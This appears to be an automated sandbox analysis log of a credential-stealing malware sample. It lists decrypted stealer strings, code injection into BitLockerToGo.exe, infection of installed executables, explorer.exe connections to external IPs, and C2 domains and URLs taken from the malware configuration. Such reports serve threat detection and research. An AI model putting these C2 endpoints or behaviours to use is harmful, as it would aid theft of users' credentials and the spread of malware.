Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: qToYrJ--

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 31_2_02EC7A10 CryptUnprotectData,

31_2_02EC7A10

Source: F6D9.exe, 00000018.00000003.2189735837.000002598C8F1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_46ba3798-7

Source: 7Y18r(14).exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\7Y18r(14).exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.10:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.10:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.10:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.10:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49854 version: TLS 1.2

Source:	Binary string: rust_dave_sideload.pdb source: vm.exe, 00000025.00000002.3761757300.0000000070078000.00000002.00000001.01000000.00000018.sdmp, lm.exe, 00000026.00000002.2910739213.0000000070008000.00000002.00000001.01000000.00000019.sdmp, vm.exe, 0000002B.00000002.2941431494.0000000070078000.00000002.00000001.01000000.00000018.sdmp, g2m.dll.32.dr, g2m.dll0.32.dr
Source:	Binary string: BitLockerToGo.pdb source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323520937.0000023B60790000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C000800000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C0008EC000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323973343.0000023B60750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 00000020.00000002.2624078104.0000020A687F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A687AD000.00000004.00000800.00020000.00000000.sdmp, lm.exe.32.dr
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.5.dr
Source:	Binary string: BitLockerToGo.pdbGCTL source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323520937.0000023B60790000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C000800000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C0008EC000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323973343.0000023B60750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 00000020.00000002.2624078104.0000020A687F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A687AD000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000000.2595768222.0000000000402000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 00000025.00000002.3739220721.0000000000402000.00000002.00000001.01000000.00000016.sdmp, lm.exe, 00000026.00000000.2596792457.0000000000402000.00000002.00000001.01000000.00000017.sdmp, lm.exe, 00000026.00000002.2884350710.0000000000402000.00000002.00000001.01000000.00000017.sdmp, vm.exe, 0000002B.00000002.2871363883.0000000000402000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 0000002B.00000000.2753936670.0000000000402000.00000002.00000001.01000000.00000016.sdmp, lm.exe.32.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 5_2_00BA29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		5_2_00BA29E2
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 17_2_00EE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		17_2_00EE29E2

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Code function: 5_2_00BA2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

5_2_00BA2B8C

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+54h]	31_2_02EC72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	31_2_02EC72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	31_2_02EB3260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+50h]	31_2_02EC91C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+54h]	31_2_02EC7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	31_2_02EC7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	31_2_02EE7E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	31_2_02EC2E51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000820h]	31_2_02ED6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+1Ch]	31_2_02ED6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	31_2_02ED6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+50h]	31_2_02ED6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push eax	31_2_02EE3CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+30h]	31_2_02EBFCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+00000200h]	31_2_02EBFCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	31_2_02EC6CB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	31_2_02EEA479
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp]	31_2_02EE9C20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+70h]	31_2_02EC7DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	31_2_02EC7DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h	31_2_02EC82CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	31_2_02EB3A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], 0000h	31_2_02EC3A2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then lea ebp, dword ptr [esp+03h]	31_2_02ED6210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esi+08h]	31_2_02EC43E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h	31_2_02ED4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [02EF4A9Ch]	31_2_02ED4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	31_2_02EE1BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	31_2_02ED33B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	31_2_02ECB360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	31_2_02EEB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	31_2_02EEB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	31_2_02EEB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	31_2_02EC30F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	31_2_02EC30F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, eax	31_2_02EB38D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h	31_2_02ECE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	31_2_02ECE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	31_2_02EE8880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ecx], ax	31_2_02EC5871
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	31_2_02EEB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	31_2_02EEB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	31_2_02EBA000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h	31_2_02ECD810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [02EF4970h]	31_2_02ED41A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, word ptr [ebx+eax*4]	31_2_02EB8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	31_2_02EB8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	31_2_02EEB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	31_2_02EEB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	31_2_02EEB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	31_2_02ECB920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	31_2_02ECB920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	31_2_02EC1937
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	31_2_02EC6EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then inc ebx	31_2_02EC66B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	31_2_02EC4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	31_2_02EC4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	31_2_02EC4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	31_2_02EC3678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	31_2_02ED37B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov al, 01h	31_2_02EEA706
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	31_2_02EEB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	31_2_02EEB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	31_2_02EEB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	31_2_02EE6710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	31_2_02EBE450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	31_2_02ECEC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	31_2_02EC3DE6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	31_2_02ED65F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	31_2_02EB2DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	31_2_02EEB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	31_2_02EEB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	31_2_02EEB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	31_2_02EC1D52

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.221.157.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.139 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.137 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 211.168.53.110 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.235.84 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.113.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 127.0.0.127 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.165.133.52 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.235.128.153 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: http://evilos.cc/tmp/index.php
Source: Malware configuration extractor	URLs: http://gebeus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://office-techs.biz/tmp/index.php
Source: Malware configuration extractor	URLs: http://cx5519.com/tmp/index.php

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 799
